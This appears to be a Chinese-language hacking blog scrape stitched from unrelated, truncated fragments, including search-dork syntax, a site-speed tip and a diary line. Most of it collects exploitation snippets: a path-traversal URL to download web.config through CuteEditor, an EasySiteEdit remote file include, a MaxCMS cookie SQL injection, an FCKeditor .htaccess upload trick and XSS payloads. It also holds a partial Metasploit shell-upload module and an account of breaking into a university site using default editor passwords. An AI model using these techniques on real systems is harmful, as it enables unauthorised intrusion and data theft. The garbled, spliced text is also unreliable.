改变编码中0的数量 (\0X -> \00000X)。

网上好多这样的文章我的只不过是来个小总结，恩其实光是总结还不够，因为我写的还不是很全面。
其实搜索这些漏洞我们必须要先连接关于搜索引擎的一些语法下面给大家介绍一下：

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字).
site: 可以限制你搜索范围的域名.
filetype: 搜索文件的后缀或者扩展名
intitle: 限制你搜索的网页标题.

网站访问速度问题其实应该居于站长应该考虑的最优先的问题，网站访问慢直接关系到网站访问量，用户体验度的问题。今天我就来给大家介绍几种通用的解决网站太慢的方法。

　　1.通过浏览器插件找出网页请求过程中的加载时间问题

　　这里推荐使用火狐的Firefbug或者谷歌浏览器的开发人员工具(F12)，这里以firebug为例，装好firebug后，在打开firebug的情况下，刷新你的网站页面，如图：

 感觉时间真的过得真的很快，电脑一开一关一天就没了。不能这样下去，所以我打算抽出点时间来写博客和学习，记录一下自己的成长。

Team:t00ls Author: Cond0r

if($_REQUEST){

if(get_magic_quotes_gpc()){

$_REQUEST = tao_strip($_REQUEST);

}else{

$_POST = tao_check($_POST);

$_GET = tao_check($_GET);

@extract($_POST);

@extract($_GET);

}

$_REQUEST=filter_xss($_REQUEST, ALLOWED_HTMLTAGS);

@extract($_REQUEST);

只做了简单的简单的过滤

漏洞文件

shops.php

$cid = addslashes($_GET['ci

受影响版本 eWebEditor 2.8 免费版

   这两天没什么事情闲着无聊就打开了许久不用的WEB漏洞扫描工具对外的打某高校进行了注入漏洞检查！发现漏洞以后发现两所学校打网址是一个公司做的就开始了渗透....

   首先进入打是一个同服务器打分站后台！进入以后发现不能上传网页文件且编辑器傻用eWebEditor 2.8 打免费版本试了下默认密码ADMIN  AMIN888密码不正确准备想别打办法打时候误操作把账号蓝打入了密码，已经打进去了就别改了抱着试试看打态度把密码栏还傻打上ADMIN888没想到进去了，，

标题: webadmin <= Shell Upload Vulnerability (MSF)
作者: Caddy-Dz

下载地址: http://wacker-welt.de/webadmin/webadmin.php.gz
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
 
    def initiali

/**************************Mssql***********************/
<!–#include file=”conn.asp”–>
<%
hid=request.QueryString(“id”)
sql=”select * from admin where id=”&hid
set rs=conn.execute (sql)
%>

/**************************Access***********************/
<%
db=”aspzhuru.mdb”‘这里修改数据库路径或名称
Set conn = Server.CreateObject(“ADODB.Connection”)
dbpath=”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & Server.MapPath(

EasySiteEdit远程文件包含缺陷及修复

Exploit Title: EasySiteEdit remote file include
作者:koskesh jakesh
下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
测试:
http://www.xxx.cn

方法1.直接下载load.ashx配置文件

http://www.badguest.cn /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

然后查看一些sql配置信息 从sql数据库连接入手

<connectionStrings>

<add name=”ynncConnectionString” connectionString=”Server=.;DataBase=ynta; UID=sa;PWD=”/>

<add name=”strConn” connectionString=”Server=.;DataBase=ynta; UID=sa;PWD=”/>

</connectionString

漏洞文件：admin/admin_inc.asp

代码如下：

Sub checkPower   //第103行
        dim loginValidate,rsObj : loginValidate = "maxcms2.0"
        err.clear
        on error resume next
        set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username=''"&rCookie("m_username")&"''","execute")

FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.实用编辑器上传htaccess文件.

http://www.xxx.cn/FCKeditor/editor/filemanager/upload/test.htm

作者：kashifs

最短的跨站语句是多少？要放在以前，我一定会这样想，正常的跨站代码：<script>alert ("a")</script> ，查一下，一共27个字符。嘿嘿，不过，这之前我在《安全手册》上看到了他的一篇文章，《疯狂的跨站之行》，在这其中提到了跨站语句的另一种方法：
以下是代码片段：
<script>z='document.'</script>